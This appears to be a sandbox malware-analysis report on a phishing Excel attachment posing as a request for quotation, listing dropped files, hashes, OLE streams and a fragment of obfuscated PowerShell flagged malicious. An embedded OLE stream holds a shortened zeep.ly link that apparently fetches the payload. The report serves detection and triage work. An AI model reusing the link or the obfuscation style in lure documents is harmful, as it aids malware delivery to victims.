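These findings are triage hints rather than a verdict: legitimate PowerShell modules also call Add-Type, so the useful signal is the combination with the parent process (powershell.exe here), a DllImport of Urlmon.dll in the compiled source, and the child csc.exe/cvtres.exe pair writing into Temp, all of which this report records.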
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):512
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3::
                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                              Malicious:false
                                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):71
                                              Entropy (8bit):4.075194904034881
                                              Encrypted:false
                                              SSDEEP:3:X6RS/4AA00jNyRv76RVAv:qRoNAjQRD6nAv
                                              MD5:6B591054CA731DE548833935D71A7202
                                              SHA1:1C911135BAADB4ED81EAEC1D2B7E9EA2242C3792
                                              SHA-256:D49DF0C9DF5363C4649730406D4A63233C9B4BAD73DBA1A21E22D1B64199C73F
                                              SHA-512:7C486C099AB0B8F7E5C77B75B22C3503BEE073D16131BBE591785E692FCE43BB4EDD12D8088956511144FB515B8CBD68DEB6B882DB6F5D5A37E58DC01C7922E1
                                              Malicious:false
                                              Preview:short_478567.1.zeep.ly/.9728.3751017984.31130321.3333757246.31130319.*.
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):194206
                                              Entropy (8bit):3.8801703450865306
                                              Encrypted:false
                                              SSDEEP:3072:7merF4nF3I2A7lE9QVBpEE8gt5pdGwpgCGy8/tpmqDyJVvnpUcFoqszc:7JrF4VI9lE9aGOVvnpUcFoqszc
                                              MD5:9E0D5ADD50B62609B0D1A62A2B51B13A
                                              SHA1:6D23598F979CF1E8815A0AF91D68249E36272DFC
                                              SHA-256:E06A1DD0178864407F0E0BD4BC036E56B1D943AA07EAA743432FF16A70F38365
                                              SHA-512:F72E53232F1F382800DDA2536DCA4D8345F4B24F156CC41E8DC4DF3074908A51043F27B4B5E4A67F9BB577B9334C62C8D7CDE3D5D7E9B1D136E818822FBDF1DA
                                              Malicious:true
                                              Preview:..u.W.b.G.g.W.l.m.G.L.i.f. .=. .".P.W.z.f.W.P.p.U.z.i.N.q.".....u.p.L.O.c.z.Z.W.p.L.W.d. .=. .".L.W.W.O.W.W.W.k.a.G.v.n.".....W.L.j.i.A.H.x.U.p.m.K.U. .=. .".L.o.Z.U.h.i.e.e.A.G.u.K.".....b.m.q.c.W.b.H.K.b.k.i.B. .=. .".t.L.z.n.j.m.N.G.e.A.A.i.".....A.A.o.L.a.Z.N.W.N.e.L.h. .=. .".d.G.a.A.N.e.G.q.m.l.J.b.".....P.U.k.r.R.K.U.b.x.N.o.m. .=. .".e.o.h.G.c.e.l.c.h.H.o.I.".....K.W.N.I.P.u.L.L.Z.u.p.C. .=. .".L.i.h.f.g.m.q.z.i.L.L.L.".....T.v.P.n.z.k.A.B.a.p.x.P. .=. .".P.W.C.x.U.Q.K.G.i.f.a.O.".....U.c.L.t.c.m.L.N.p.m.v.W. .=. .".z.W.L.P.S.L.L.a.s.s.L.L.".....c.x.R.x.K.t.a.U.O.z.o.W. .=. .".G.q.C.z.G.c.b.L.N.T.Z.k.".........U.L.A.C.x.G.W.W.c.G.m.Z. .=. .".Z.g.u.C.i.K.L.W.e.o.K.p.".....W.K.h.J.W.K.k.q.Q.R.u.x. .=. .".x.k.L.W.C.U.c.N.b.f.b.d.".....x.L.P.O.h.d.u.L.U.b.o.g. .=. .".L.K.Z.p.m.P.W.K.L.L.L.c.".....P.m.g.L.O.u.W.h.R.l.L.O. .=. .".Z.o.A.n.k.x.b.e.t.G.W.e.".....T.R.A.p.i.o.G.k.n.c.k.c. .=. .".k.L.i.L.i.d.R.S.n.J.h.P.".....b.q.b.b.U.Z.u.B.k.o.H.o. .=. .".z.W.k.Z.W.W.W.L.e.o.W.e.".....i.
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 9 16:49:12 2024, Security: 1
                                              Category:dropped
                                              Size (bytes):175104
                                              Entropy (8bit):7.908618258770144
                                              Encrypted:false
                                              SSDEEP:3072:zXINLAL/GkVleHluVD7Mj7pMciSvsTL5ybgyju0DrFjigmX:z4Zq/fVle0VA7q2vsTL5ybE0DrVRmX
                                              MD5:8BE276AC02948DCCDF300B16E67A4AFF
                                              SHA1:ACB16041352E9111EB4A53D176CBDAE0DE34CDED
                                              SHA-256:ED8C0C496529FD73AE1F7C3AB16A4E9B55B93C56924245B93032A9543903145A
                                              SHA-512:0542392527FA14BF52DBCC1055582551DA18E32AFC9F0C5A39A37798B0224F86575DD0C1BBDB011FB489D7FD2B5BD142296328AA4A4DAEBCF4CF7B2FC98522E6
                                              Malicious:false
                                              Preview:......................>...................................'...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................S................................................................................................................... ...!..."...#...$...%...&...........)...T...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...k.......l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 9 16:49:12 2024, Security: 1
                                              Category:dropped
                                              Size (bytes):175104
                                              Entropy (8bit):7.908618258770144
                                              Encrypted:false
                                              SSDEEP:3072:zXINLAL/GkVleHluVD7Mj7pMciSvsTL5ybgyju0DrFjigmX:z4Zq/fVle0VA7q2vsTL5ybE0DrVRmX
                                              MD5:8BE276AC02948DCCDF300B16E67A4AFF
                                              SHA1:ACB16041352E9111EB4A53D176CBDAE0DE34CDED
                                              SHA-256:ED8C0C496529FD73AE1F7C3AB16A4E9B55B93C56924245B93032A9543903145A
                                              SHA-512:0542392527FA14BF52DBCC1055582551DA18E32AFC9F0C5A39A37798B0224F86575DD0C1BBDB011FB489D7FD2B5BD142296328AA4A4DAEBCF4CF7B2FC98522E6
                                              Malicious:false
                                              Preview:......................>...................................'...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................S................................................................................................................... ...!..."...#...$...%...&...........)...T...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...k.......l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:modified
                                              Size (bytes):165
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                              Malicious:true
                                              Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 9 07:52:02 2024, Security: 1
                                              Entropy (8bit):7.808393317199207
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 47.99%
                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                              File name:RFQ_0230909024SEPT.xla.xlsx
                                              File size:184'320 bytes
                                              MD5:4845ee83a0c0be0e039c18c4d7720ee1
                                              SHA1:770f3d61acab0397fef8a398a1b9c4e3ad8b59ad
                                              SHA256:5d0bf961a7a1039d1ec84f5dc6705d922d6aea6ed935e2481d07e2428c743dc5
                                              SHA512:cfc47eca753c568069d40884742a2c95d5ece3fdfe074e32112165916664aba81473a476693094177e5a61b409c045e4cf0461ac164f9d16860cbb0f7788533c
                                              SSDEEP:3072:EXINLfSaEZsdsqLG5M3x5XRSfZjMtY0ZXXBg7zXWX8l3PKr99g3T0:E4ZfS1K9LG54x5XRsGy0/Ozfl49
                                              TLSH:BA0402A53012E584C602A1B1CED5D1DB6B20FE62AE82CB5B396BBF1F697D502D707306
                                              File Content Preview:........................>...................................'...................j..............................................................................................................................................................................
                                              Icon Hash:2562ab89a7b7bfbf
                                              Document Type:OLE
                                              Number of OLE Files:1
                                              Has Summary Info:
                                              Application Name:Microsoft Excel
                                              Encrypted Document:True
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:False
                                              Flash Objects Count:0
                                              Contains VBA Macros:True
                                              Code Page:1252
                                              Author:
                                              Last Saved By:
                                              Create Time:2006-09-16 00:00:00
                                              Last Saved Time:2024-09-09 06:52:02
                                              Creating Application:Microsoft Excel
                                              Security:1
                                              Document Code Page:1252
                                              Thumbnail Scaling Desired:False
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:786432
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                              VBA File Name:Sheet1.cls
                                              Stream Size:977
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 2a 92 a4 df 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Attribute VB_Name = "Sheet1"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                              VBA File Name:Sheet2.cls
                                              Stream Size:977
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * m . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 2a 92 db 6d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Attribute VB_Name = "Sheet2"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                              VBA File Name:Sheet3.cls
                                              Stream Size:977
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * D 7 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 2a 92 44 37 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Attribute VB_Name = "Sheet3"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                              VBA File Name:ThisWorkbook.cls
                                              Stream Size:985
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . n . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 2a 92 0d 6e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Attribute VB_Name = "ThisWorkbook"
                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path:\x1CompObj
                                              CLSID:
                                              File Type:data
                                              Stream Size:114
                                              Entropy:4.25248375192737
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              CLSID:
                                              File Type:data
                                              Stream Size:244
                                              Entropy:2.889430592781307
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                              General
                                              Stream Path:\x5SummaryInformation
                                              CLSID:
                                              File Type:data
                                              Stream Size:200
                                              Entropy:3.2241247550157985
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                              General
                                              Stream Path:MBD000E0291/\x1CompObj
                                              CLSID:
                                              File Type:data
                                              Stream Size:99
                                              Entropy:3.631242196770981
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              General
                                              Stream Path:MBD000E0291/Package
                                              CLSID:
                                              File Type:Microsoft Excel 2007+
                                              Stream Size:17996
                                              Entropy:7.616402050559727
                                              Base64 Encoded:True
                                              Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              General
                                              Stream Path:MBD000E0292/\x1Ole
                                              CLSID:
                                              File Type:data
                                              Stream Size:406
                                              Entropy:6.530118727485162
                                              Base64 Encoded:False
                                              Data ASCII:. . . . O . . W A . . . . . . . . . . . . . . . . y . . . K . . . . . h . t . t . p . s . : . / . / . z . e . e . p . . . l . y . / . y . D . f . v . h . . . . > . . $ k 0 . q . 3 C Q , . I . @ G h h w . . \\ . k < 7 Y . S , . C . s s * 1 . . 2 . I . | - e Q . . ~ ( S U s q . f = . @ * , V ` & 3 V m . 5 B 4 z ? . : 1 . g . g 7 : ? x } w g s . f . $ n . . . . l . C 2 N . . p . . ] . ] v m H G 2 . h G ( . 3 C . . J v ? v . g . v w . . . . . . . . . . . . . . . . . . . . s . q . 4 . z . d . 3 . t . p . S . p .
                                              Data Raw:01 00 00 02 b1 4f 02 0a 9d 57 d1 41 00 00 00 00 00 00 00 00 00 00 00 00 1a 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 16 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 7a 00 65 00 65 00 70 00 2e 00 6c 00 79 00 2f 00 79 00 44 00 66 00 76 00 68 00 00 00 cd 13 3e 17 a3 09 24 ab 8b 8a 6b b5 8c 8e 30 1a a3 71 a2 bb 03 33 43 c7 51 ba 2c e8 e3 0b 49 95 0b 95 95 40
                                              General
                                              Stream Path:Workbook
                                              CLSID:
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Stream Size:150274
                                              Entropy:7.995643972011389
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . @ . . n . + w . ? . # A [ p n f . $ M . = 3 . 9 @ . . . . . . . . . . . ] D . . . \\ . p . . " % . . . . I " v . . > . J c . & @ W p . } a R [ g ~ . P e . Q p . O ( ( ! . M . . . ] . c D v T . . . e . I B . . . = ; a . . . G . . . = . . . x } . . . . / | g h x w . . c . . . d . . . . . . . . . . . . . C b . . . - . . . . { j = . . . R b N . . w p $ \\ . } @ . . . . . . . . " . . . J . . . . p . . . , . . . k 1 . . . / R . f . ^ s g & . . . c . 1 . . .
                                              Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 05 40 09 e8 04 fa ba 6e 86 09 bf a5 d3 2b f4 77 b0 19 3f 06 23 41 bf 5b 70 f1 6e 66 08 24 98 4d 13 3d ba ef 89 33 00 d3 de fb aa 39 40 14 a0 82 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 5d 44 e2 00 00 00 5c 00 70 00 18 22 e6 25 9a 0d 90 f7 be 09 0b d4 9f 49 22 d0 76 bd 9e 9f a1 fd 9a af dd df
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                              CLSID:
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:525
                                              Entropy:5.291855604435296
                                              Base64 Encoded:True
                                              Data ASCII:I D = " { 8 E D 8 E D A 6 - 8 1 8 A - 4 1 8 B - 9 B 8 3 - 4 C C 4 5 E D D F D 5 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 7 7 7 5 4 5 4 D C 5 D D A B E 1 A
                                              Data Raw:49 44 3d 22 7b 38 45 44 38 45 44 41 36 2d 38 31 38 41 2d 34 31 38 42 2d 39 42 38 33 2d 34 43 43 34 35 45 44 44 46 44 35 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                              CLSID:
                                              File Type:data
                                              Stream Size:104
                                              Entropy:3.0488640812019017
                                              Base64 Encoded:False
                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
